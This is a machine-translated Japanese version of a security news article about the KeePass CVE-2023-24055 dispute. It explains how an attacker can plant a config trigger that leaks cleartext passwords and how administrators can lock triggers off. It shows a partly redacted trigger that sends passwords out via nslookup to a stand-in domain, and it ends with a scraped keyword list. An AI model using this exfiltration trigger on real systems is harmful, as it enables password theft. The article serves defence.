パスワード マネージャー (使用する Web サイトごとに異なるパスワードを作成し、それらすべてを追跡するのに役立つ便利なユーティリティ) にとって、ニュースに値する数週間でした。
2022 年末に、LastPass がニュースで取り上げられるようになりました。同社は、2022 年 XNUMX 月に発生した侵害が実際に顧客のパスワードに行き着いたことを最終的に認めました。 金庫室が盗まれる バックアップされたクラウド サービスから。
(ボールトは暗号化されており、LastPass はバックアップ ボールト ファイル自体の「マスター キー」のコピーを持っていなかったため、パスワード自体は盗まれませんでしたが、ほとんどの人が聞いて喜んでいたよりも、より正確なシェービングでした。)
その後、LifeLock がニュースのいたるところに出回る番になりました。 パスワード推測攻撃、おそらくまったく別の Web サイトから盗まれたパスワードに基づいており、おそらく少し前に、最近ダーク Web で購入したものです。
LifeLock 自体は侵害されていませんでしたが、一部のユーザーは侵害されていました。
競合他社の 1Password と BitWarden も最近ニュースになっています。悪意のある広告が Google によって明らかに無意識に放映され、アカウントの詳細をフィッシングする目的でユーザーを説得力のあるログオン ページに誘導したという報告に基づいています。
次はKeePassの番です ニュースで、今回はさらに別のサイバーセキュリティの問題についてです。 脆弱性は、攻撃者が悪用できるサイバーセキュリティ ホールにつながるソフトウェア バグを指す専門用語です。
パスワードスニッフィングが簡単に
私たちはそれを 脆弱性 これは、米国国立標準技術研究所によって発行された公式のバグ ID があるためです。
バグはダビングされました CVE-2023-24055: XML 構成ファイルへの書き込みアクセス権を持つ攻撃者は、エクスポート トリガーを追加することで、平文のパスワードを取得できます。
残念ながら、クリアテキストのパスワードを取得できるという主張は真実です。
あなたのいわゆる個人ファイルを含むあなたの個人ファイルへの書き込みアクセス権がある場合 %APPDATA%
ディレクトリ、私はこっそり構成セクションを微調整して、既にカスタマイズした KeePass 設定を変更したり、意図的に何も変更していない場合はカスタマイズを追加したりできます…
…そして、暗号化されていない CSV ファイルとしてデータベース全体をダンプするなどして大量に、またはアクセスするたびにトリガーされる「プログラム フック」を設定するなどしてパスワードを使用しながら、平文のパスワードを驚くほど簡単に盗むことができます。データベースからのパスワード。
必要ないことに注意してください 管理者 KeePassアプリが保存される実際のインストールディレクトリをいじる必要がないため、これは通常、通常のユーザーには立ち入り禁止です
また、ロックダウンされたグローバル構成設定にアクセスする必要もありません。
興味深いことに、KeePass は、システム管理者権限をすでに持っているユーザーであっても、改ざん防止技術を使用してさまざまなキーロガー対策のトリックを阻止するなど、パスワードの使用時にパスワードが傍受されるのを阻止するために最善を尽くしています.
しかし、KeePass ソフトウェアを使用すると、平文のパスワード データを驚くほど簡単に取得できます。これは、管理者でなくても「簡単すぎる」と思われるかもしれません。
KeePass GUI を使用して、 トリガー パスワードをクリップボードにコピーするたびにイベントを実行し、そのイベントを設定して、問題のユーザー名と平文パスワードの両方を含む DNS ルックアップを実行します。
次に、そのオプションのそれほど明白ではない XML 設定を、独自のローカル構成ファイルからシステム上の別のユーザーの構成ファイルにコピーできます。その後、DNS ルックアップを介してインターネット上でパスワードが漏洩していることがわかります。
XML 構成データの大部分は読みやすく有益ですが、KeePass は奇妙なことに GUID (略して GUID) として知られるランダムなデータ文字列を使用します。 グローバルに一意の識別子) さまざまな トリガー そのため、十分な情報を持っているユーザーでも、どのトリガーがどのように設定されているかを理解するには、広範な参照リストが必要になります。
DNSリークのトリガーは次のようになりますが、詳細の一部を編集したため、このテキストを直接コピーして貼り付けるだけですぐに害を及ぼすことはありません。
XXXXXXXXXXXXXXXXXXXXX コピーDNS ルックアップを介して情報を盗むXXXXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXXXX nslookup XXXXX.XXXXX.blah.test 真実1
このトリガーをアクティブにすると、KeePass パスワードにアクセスすると、選択したドメインへの目立たない DNS ルックアップで平文が漏洩します。 blah.test
この例では、
実際の攻撃者は、ほぼ確実に、盗まれたテキストをスクランブルまたは難読化することに注意してください。これにより、DNS リークが発生したときの発見が難しくなるだけでなく、アクセント付きの文字や絵文字などの非 ASCII 文字を含むパスワードも処理されます。それ以外の場合は DNS 名で使用できません。
しかし、それは本当にバグですか?
ただし、トリッキーな質問は、 「これは本当にバグなのか、それとも、少なくともあなた自身と同じくらいあなたの個人ファイルを制御する必要がある誰かによって悪用される可能性のある単なる強力な機能なのか?」
簡単に言えば、あなたのアカウントを既に制御している誰かが、あなたのアカウントがアクセスできるはずのファイルをいじることができる場合、それは脆弱性ですか?
この種のバグ/機能が悪用されるのをより困難にするために、pssword マネージャーに改ざん保護の余分なレイヤーが多数含まれることを望むかもしれませんが、そうすべきです。 CVE-2023-24055 本当に CVE に記載された脆弱性なのですか?
もしそうなら、次のようなコマンドはありません DEL
(ファイルを削除)および FORMAT
「バグ」も必要ですか?
また、潜在的に危険な動作を誘発するのをはるかに容易にする PowerShell の存在自体もそうではありません (試してみてください)。 powerhsell get-clipboard
、たとえば)、それ自体が脆弱性になるのでしょうか?
それが KeePass の立場であり、 「バグ」詳細 NIST の Web サイト:
** 論争中 ** […] 注: ベンダーの立場は、パスワード データベースは、ローカル PC へのそのレベルのアクセス権を持つ攻撃者に対して安全であることを意図していないというものです。
何をするか?
スタンドアロンの KeePass ユーザーの場合は、KeePass アプリを開いて、 ツール > トリガー… ウィンドウ:
あなたは全体を回すことができることに注意してください トリガー を選択解除するだけで、このウィンドウからシステムをオフにできます。 [ ] Enable trigger system
オプション…
…しかし、それはグローバル設定ではないため、ローカル構成ファイルを介して再度有効にすることができます。したがって、攻撃者がアカウントにアクセスするのではなく、間違いから保護するだけです.
グローバルな「ロックダウン」ファイルを変更することで、コンピューター上のすべてのユーザーに対してオプションを強制的にオフにすることができます。 KeePass.config.enforced.XML
、アプリ プログラム自体がインストールされているディレクトリにあります。
グローバル XML 強制ファイルが次のようになっている場合、すべてのユーザーに対してトリガーが強制的にオフになります。
間違い
(ご参考までに、この変更を元に戻すためのアプリケーション ディレクトリへの書き込みアクセス権を持つ攻撃者は、ほぼ確実に、KeePass 実行可能ファイル自体を変更するか、スタンドアロンのキーロガーをインストールしてアクティブ化するのに十分なシステム レベルの権限を持っているでしょう。)
あなたがネットワーク管理者で、KeePass をユーザーのコンピューターにロックダウンして、ユーザーを支援するのに十分な柔軟性を持たせ、サイバー犯罪者を誤って支援するほど柔軟ではない場合は、KeePass を読むことをお勧めします セキュリティ上の問題 ページ、 トリガ ページ、および 強制構成 ページで見やすくするために変数を解析したりすることができます。
- SEO を活用したコンテンツと PR 配信。 今日増幅されます。
- Platoblockchain。 Web3メタバースインテリジェンス。 知識の増幅。 こちらからアクセスしてください。
- 情報源: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- できる
- 私たちについて
- 上記の.
- 絶対の
- アクセス
- アクセス
- アクティブ
- 追加されました
- 認められた
- 広告
- 後
- に対して
- すべて
- 主張された
- 既に
- および
- 別の
- アプリ
- 申し込み
- 8月
- 著者
- オート
- バック
- 支持された
- 背景画像
- バックアップ
- ベース
- なぜなら
- さ
- 国境
- ボトム
- 違反
- バグ
- バグ
- キャプチャー
- これ
- 場合
- 生じました
- 原因
- センター
- 確かに
- 変化する
- 文字
- チェック
- 選択
- クレーム
- クローザー
- クラウド
- カラー
- 来ます
- 会社
- 完全に
- コンピュータ
- コンピューター
- 条件
- 検討
- コントロール
- コピー
- 可能性
- カバー
- 作ります
- 作成した
- シーブ
- サイバー犯罪者
- サイバーセキュリティ
- 危険な
- 暗いです
- ダークウェブ
- データ
- データベース
- 細部
- DID
- 異なります
- 直接に
- ディスプレイ
- DNS
- ドメイン
- ドント
- ダウン
- ダビングされた
- 容易
- 簡単に
- どちら
- では使用できません
- 執行
- 十分な
- 全体
- さらに
- イベント
- あらゆる
- 誰も
- 例
- 悪用する
- export
- 広範囲
- 余分な
- 特徴
- 少数の
- File
- 最後に
- もう完成させ、ワークスペースに掲示しましたか?
- フレキシブル
- フォロー中
- 強
- 発見
- から
- 取得する
- 受け
- グローバル
- ゴエス
- でログイン
- ハンディ
- ハッピー
- 持って
- 高さ
- 助けます
- こちら
- 穴
- 希望
- ホバー
- 認定条件
- しかしながら
- HTML
- HTTPS
- 識別子
- 即時の
- in
- include
- 含まれました
- 含めて
- 有益な
- install
- 機関
- インターネット
- 問題
- 発行済み
- IT
- 自体
- 専門用語
- キープ
- 既知の
- 主として
- のLastPass
- 層
- つながる
- 漏れ
- リーク
- レベル
- リスト
- ローカル
- 見
- LOOKS
- 検索
- 製
- make
- 作る
- マネージャー
- マネージャー
- マージン
- 最大幅
- かもしれない
- ミス
- ミス
- 修正する
- 最も
- 名
- 国民
- 必要
- ネットワーク
- ニュース
- ニスト
- 通常の
- 入手する
- 公式
- 開設
- オプション
- さもないと
- 自分の
- パラメーター
- パスワード
- パスワード
- Paul Cairns
- PC
- のワークプ
- おそらく
- 個人的な
- フィッシング詐欺
- 平文
- プラトン
- プラトンデータインテリジェンス
- プラトデータ
- 位置
- 投稿
- :
- 電力
- 強力な
- 力
- PowerShellの
- プライベート
- 特権
- 多分
- 演奏曲目
- 購入した
- 目的
- 置きます
- 質問
- ランダム
- 発疹
- リーディング
- 最近
- 推奨する
- レギュラー
- 覚えています
- 返信
- 報告
- レポート
- 逆
- リスク
- ラン
- セクション
- 安全に
- センス
- サービス
- セッションに
- 設定
- 設定
- ショート
- すべき
- 単に
- So
- ソフトウェア
- 固体
- 一部
- 誰か
- Spot
- スタンドアロン
- 規格
- まだ
- 盗まれました
- Force Stop
- 保存され
- そのような
- 想定
- SVG
- 取る
- テクニック
- テクノロジー
- アプリ環境に合わせて
- 自分自身
- したがって、
- 介して
- 時間
- 〜へ
- あまりに
- top
- 追跡する
- 遷移
- トランスペアレント
- トリガー
- true
- 順番
- オン
- 一般的に
- ユニーク
- URL
- us
- つかいます
- ユーザー
- users
- 公益事業
- さまざまな
- ボールト
- 金庫
- 、
- 脆弱性
- W3
- 方法
- ウェブ
- ウェブサイト
- ウィークス
- この試験は
- which
- 誰
- 意志
- 不思議に思います
- 仕事
- でしょう
- 書きます
- XML
- あなたの
- あなた自身
- ゼファーネット